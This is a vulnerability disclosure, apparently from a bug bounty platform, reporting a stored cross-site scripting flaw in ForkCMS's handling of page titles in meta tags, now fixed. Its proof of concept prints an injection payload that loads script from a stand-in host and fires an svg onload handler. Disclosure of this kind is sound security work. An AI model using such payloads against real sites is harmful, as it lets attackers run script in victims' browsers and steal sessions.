Cross-site Scripting (XSS) - Stored in forkcms/forkcms

Valid

Reported on

Oct 19th 2021

Description

Hello. ForkCMS does not properly sanitize the website's TITLE when it is imported into the meta tags.

Proof of Concept

If we set the page title to something like this: <title>Home - Hi'>"<script src=//xss></script><x="{9*9}\r\n%0A%09%0D<svg\onload=confirm(1)></title>

It gets reflected back here: <meta name="application-name" content="Hi'>"<script src=//xss></script><x="{9*9}\r\n%0A%09%0D<svg\onload=confirm(1)>">

Impact

This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website.

References

21 other things that hackers can do with an XSS flaw

We have contacted a member of the forkcms team and are waiting to hear back a year ago

Jelmer Prins validated this vulnerability a year ago

geeknik has been awarded the disclosure bounty

The fix bounty is now up for grabs

Jelmer Prins marked this as fixed in 5.11.0 with commit c21306 a year ago

Jelmer Prins has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation